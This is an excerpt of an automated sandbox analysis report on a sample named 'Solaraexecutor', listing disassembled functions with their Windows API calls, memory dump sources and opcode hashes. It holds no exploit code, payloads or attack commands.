Function 00D21E50 Relevance: 3.1, APIs: 2, Instructions: 86COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D21E55

Part of subcall function 00D23BBA: __EH_prolog.LIBCMT ref: 00D23BBF

_wcslen.LIBCMT ref: 00D21EFD

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: H_prolog$_wcslen
String ID:
API String ID: 2838827086-0
Opcode ID: a7492163218584494135390fd2610ea764cefed8688c79dc6d573158c6d0aa0d
Instruction ID: dfa4fd7fe0e3ccbc3cadd60ae767dd488e6d5c8a2df913beda7b5759eda1a4dd
Opcode Fuzzy Hash: a7492163218584494135390fd2610ea764cefed8688c79dc6d573158c6d0aa0d
Instruction Fuzzy Hash: CE315876904219ABCF11EF98D945AEEFBF6EF28304F2440A9F845A3251CB325E04CB70

Function 00D29DA2 Relevance: 3.1, APIs: 2, Instructions: 83timeCOMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00D273BC,?,?,?,00000000), ref: 00D29DBC
SetFileTime.KERNELBASE(?,?,?,?), ref: 00D29E70

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: File$BuffersFlushTime
String ID:
API String ID: 1392018926-0
Opcode ID: bcd584c2dc8f902646e49d840f8e2c7629018ed95e4943fc6ceb6f87df32ecd4
Instruction ID: 1258eb29e4b7a7fd3da9eeb6b5f42cec494ee8d2b4adaa1b74b7906254da2dd0
Opcode Fuzzy Hash: bcd584c2dc8f902646e49d840f8e2c7629018ed95e4943fc6ceb6f87df32ecd4
Instruction Fuzzy Hash: 4821D031249356ABC714DF74D8A1AABFBE4AFA5708F08491CF4C587181D329E90D9B72

Function 00D2966E Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00D29F27,?,?,00D2771A), ref: 00D296E6
CreateFileW.KERNEL32(?,?,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00D29F27,?,?,00D2771A), ref: 00D29716

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 201efac70d509cf30bd7216b4707d20015bafbbea6673dbea39a3c70adc760ce
Instruction ID: 432e550c029b5e5be548bce0e275ada364184fcea2a6dff5304ca122ddb65691
Opcode Fuzzy Hash: 201efac70d509cf30bd7216b4707d20015bafbbea6673dbea39a3c70adc760ce
Instruction Fuzzy Hash: 85210071104354AFE3308A65DC89FB7B7DCEB6932AF040A19FAD6C21C1C7B4A8848631

Function 00D29E80 Relevance: 3.1, APIs: 2, Instructions: 56COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00D29EC7
GetLastError.KERNEL32 ref: 00D29ED4

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: bc97cd410f2c4e8a2891b4a697d085df1e3e0d1413f39c9971ff02dac085134a
Instruction ID: 8da971542a796bdf5015642ea301b130c1f769c70324b1bd13423c62e0068aac
Opcode Fuzzy Hash: bc97cd410f2c4e8a2891b4a697d085df1e3e0d1413f39c9971ff02dac085134a
Instruction Fuzzy Hash: 1F112570600320ABD724C628D860BA6F3E8AF24374F540A29F4A2D26D0E3B0ED45C770

Function 00D48E54 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00D48E75

Part of subcall function 00D48E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D4CA2C,00000000,?,00D46CBE,?,00000008,?,00D491E0,?,?,?), ref: 00D48E38

HeapReAlloc.KERNEL32(00000000,?,?,?,00000007,00D61098,00D217CE,?,?,00000007,?,?,?,00D213D6,?,00000000), ref: 00D48EB1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: 1ae78bb7ab9f1e963a7c5b267b49a44237fcce769295d187a8cda5dfbadc4acf
Instruction ID: 5d617f802adffb2d2307da8f28a93b196d49d8d9115dc7c7e47e92d7e44fe769
Opcode Fuzzy Hash: 1ae78bb7ab9f1e963a7c5b267b49a44237fcce769295d187a8cda5dfbadc4acf
Instruction Fuzzy Hash: 84F096326012156BDB212A669C05B6F7758CF81BF0F6C4136F868A7191DF72DD00B5B0

Function 00D3109E Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00D310AB
GetProcessAffinityMask.KERNEL32(00000000), ref: 00D310B2

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 7c02060d89eeb41c4e3f89cd820e839d59a0e935064d4ec29735140c1bdcb0e5
Instruction ID: f6b4da4ef6aed4ba738170d90805d1bc73b0a857881b1ba6900a71ec1a6c6ad0
Opcode Fuzzy Hash: 7c02060d89eeb41c4e3f89cd820e839d59a0e935064d4ec29735140c1bdcb0e5
Instruction Fuzzy Hash: FBE0D836B0034AA7CF0D8BB89C058EB73DDEA44345B148175E803E7241F970DE414A70

Function 00D2A4ED Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D2A325,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A501

Part of subcall function 00D2BB03: _wcslen.LIBCMT ref: 00D2BB27

SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D2A325,?,?,?,00D2A175,?,00000001,00000000,?,?), ref: 00D2A532

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: d5b60f433a284cd3d41ecf76052b83111a648a7a6806c1e73a4db066740f0601
Instruction ID: 92e430b07ecd354c8e829db3999be467a38c8ec35f2ae4bf23d32893b92a4f97
Opcode Fuzzy Hash: d5b60f433a284cd3d41ecf76052b83111a648a7a6806c1e73a4db066740f0601
Instruction Fuzzy Hash: 14F03932240319BBDF025F64EC45FDA376CEB1438AF488461BD49D62A0DB71DA98EA70

Function 00D2A1E0 Relevance: 3.0, APIs: 2, Instructions: 27fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(000000FF,?,?,00D2977F,?,?,00D295CF,?,?,?,?,?,00D52641,000000FF), ref: 00D2A1F1

Part of subcall function 00D2BB03: _wcslen.LIBCMT ref: 00D2BB27

DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00D2977F,?,?,00D295CF,?,?,?,?,?,00D52641), ref: 00D2A21F

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: DeleteFile$_wcslen
String ID:
API String ID: 2643169976-0
Opcode ID: de8ba115f2665df7c6946a99fd588bd8a197c8ad1cf01fac9ac6847a94092147
Instruction ID: 2d32e2788bf4e1b03d0f993195779dc79924165c1ddf72c1f7ce6c052f7e8dcc
Opcode Fuzzy Hash: de8ba115f2665df7c6946a99fd588bd8a197c8ad1cf01fac9ac6847a94092147
Instruction Fuzzy Hash: 65E09231140319ABEB015F64EC45FD9375CEF183C6F484021B944D2190EB61DE84DA74

Function 00D3AC7C Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00D52641,000000FF), ref: 00D3ACB0
CoUninitialize.COMBASE(?,?,?,?,00D52641,000000FF), ref: 00D3ACB5

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: 5931a90795a7aa7491bf280d69670956ac527c254f6a656a5fb2ccfb2766f86d
Instruction ID: 9475a23834346140de040fa6c30aad97558ca2691c4929809d7c7208bf0214b1
Opcode Fuzzy Hash: 5931a90795a7aa7491bf280d69670956ac527c254f6a656a5fb2ccfb2766f86d
Instruction Fuzzy Hash: D8E03072544750EFCA019B59DC46B45FBA9FB48B20F004265E416D37A0CB746800CAA4

Function 00D2A243 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00D2A23A,?,00D2755C,?,?,?,?), ref: 00D2A254

Part of subcall function 00D2BB03: _wcslen.LIBCMT ref: 00D2BB27

GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00D2A23A,?,00D2755C,?,?,?,?), ref: 00D2A280

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: AttributesFile$_wcslen
String ID:
API String ID: 2673547680-0
Opcode ID: 9461ae1d50f976f051efa9f2265f30a291880044b5167e1d52eb380fbd6d2a66
Instruction ID: 7910d94885c31608d0cb556fd811f8285ca5697612f81c0c151bb8971dd66652
Opcode Fuzzy Hash: 9461ae1d50f976f051efa9f2265f30a291880044b5167e1d52eb380fbd6d2a66
Instruction Fuzzy Hash: 19E06D315003249BCB10AB68DC05BD97758EB183E6F044261BD44E72D0D6709E448AB0

Function 00D3DEC2 Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D3DEEC

Part of subcall function 00D24092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00D240A5

SetDlgItemTextW.USER32(00000065,?), ref: 00D3DF03

Part of subcall function 00D3B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00D3B579
Part of subcall function 00D3B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00D3B58A
Part of subcall function 00D3B568: IsDialogMessageW.USER32(00010424,?), ref: 00D3B59E
Part of subcall function 00D3B568: TranslateMessage.USER32(?), ref: 00D3B5AC
Part of subcall function 00D3B568: DispatchMessageW.USER32(?), ref: 00D3B5B6

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
String ID:
API String ID: 2718869927-0
Opcode ID: 97544f3baf03787110b0fcc1d00e1ba5abe797b3cd19de18748dd509feb4f643
Instruction ID: 6aad7352dbb2f68b50fa36c38b6b22982ca36e70e76bcd99f39adb00e555fda5
Opcode Fuzzy Hash: 97544f3baf03787110b0fcc1d00e1ba5abe797b3cd19de18748dd509feb4f643
Instruction Fuzzy Hash: 95E092B24143582ADF02AB61DC0AF9E3B6D9B15B89F040851B604DA1E2DA78EA509771

Function 00D3081B Relevance: 3.0, APIs: 2, Instructions: 24libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D30836
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D2F2D8,Crypt32.dll,00000000,00D2F35C,?,?,00D2F33E,?,?,?), ref: 00D30858

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: b9af5dc14602982fd0ce989380d1f2e209173fa9ead9f79a9288738695c8d558
Instruction ID: fa48ac422414dab68a9dd70e322540560315600bc04d0d3b64e90a89e51e0db0
Opcode Fuzzy Hash: b9af5dc14602982fd0ce989380d1f2e209173fa9ead9f79a9288738695c8d558
Instruction Fuzzy Hash: 5BE048764003686BDB11AB95DC05FDA7BACEF093D2F040065BA45D2184D674DA84CBF0

Function 00D3A3B9 Relevance: 3.0, APIs: 2, Instructions: 23windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D3A3DA
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D3A3E1

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: 145a8c1a502d525577aec8641f373befc9f48831ee1a909049901d41471cfc62
Instruction ID: 7761cd4ed7c7498065540b3c5f863abf758a8955580d08efc9724d2358142c67
Opcode Fuzzy Hash: 145a8c1a502d525577aec8641f373befc9f48831ee1a909049901d41471cfc62
Instruction Fuzzy Hash: 27E0ED72500218EBCB10DF99C541B99BBE8EB04365F14805AA89693241E374AE44DBB1

Function 00D42B8C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D42BAA
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D42BB5

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: f439cef7477da911c197a75ef5d358eec7ad367489dfb0ee888278b20a0d5953
Instruction ID: d57e3205d02eeb73b5c3f66c82776ef59ca9aaa8fbafae3d4da5929af0c13a71
Opcode Fuzzy Hash: f439cef7477da911c197a75ef5d358eec7ad367489dfb0ee888278b20a0d5953
Instruction Fuzzy Hash: F9D022345A43001F8C183E783D0347A3B86EE41B757F0029AF830C6DC9EF10C048A131

Function 00D212F1 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00D21306
ShowWindow.USER32(00000000), ref: 00D2130D

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: 077cbeaa0301bd18a1901e0341ad85e3f2d314488934bcaa60b817415a3bb460
Instruction ID: e1a7e610d25f094ac2d866ed81a119ea1aac0e73c17c6d72c1729a1331973eeb
Opcode Fuzzy Hash: 077cbeaa0301bd18a1901e0341ad85e3f2d314488934bcaa60b817415a3bb460
Instruction Fuzzy Hash: 01C0123206C300BECB010BB4DC0DC2BBBA8ABA5B12F04C908B0A9C0260E238C120DB21

Function 00D21A04 Relevance: 1.8, APIs: 1, Instructions: 312COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D21A09

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: de7761cf64180ef076447ac9fade7e6a84ff5db8e746b367585045a99487f9e8
Instruction ID: 8bf53bd127388c4680b35320e307184826607f38033dfc72e89f464783e86b26
Opcode Fuzzy Hash: de7761cf64180ef076447ac9fade7e6a84ff5db8e746b367585045a99487f9e8
Instruction Fuzzy Hash: C8C1C338A002649FEF15CF68D494BA97BA5EF36318F0881B9EC45DB382DB309944CB71

Function 00D23BBA Relevance: 1.7, APIs: 1, Instructions: 177COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D23BBF

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D65000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D82000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710987869.0000000000D83000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_d20000_Solaraexecutor.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: e8d63c2c09ae9683bfb7e8cdfac9927837e176eeed053139b9dadf2c0bff814e
Instruction ID: e2d0db9a15f1564ab4d4de66c17ae24d0de7e2e4a7c7d6383015a52b463a639f
Opcode Fuzzy Hash: e8d63c2c09ae9683bfb7e8cdfac9927837e176eeed053139b9dadf2c0bff814e
Instruction Fuzzy Hash: 5C71EF71500B949ECB35DB70D8419E7B7E9EF24304F44092EF2AB83242DA366A88DF31

Function 00D28284 Relevance: 1.6, APIs: 1, Instructions: 114COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D28289

Part of subcall function 00D213DC: __EH_prolog.LIBCMT ref: 00D213E1

Part of subcall function 00D2A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00D2A598

Memory Dump Source

Source File: 00000003.00000002.1710873663.0000000000D21000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000003.00000002.1710854804.0000000000D20000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710901398.0000000000D53000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1710922704.0000000000D5E000.00000004.00000001.01000000.00000006.sdmpDownload File
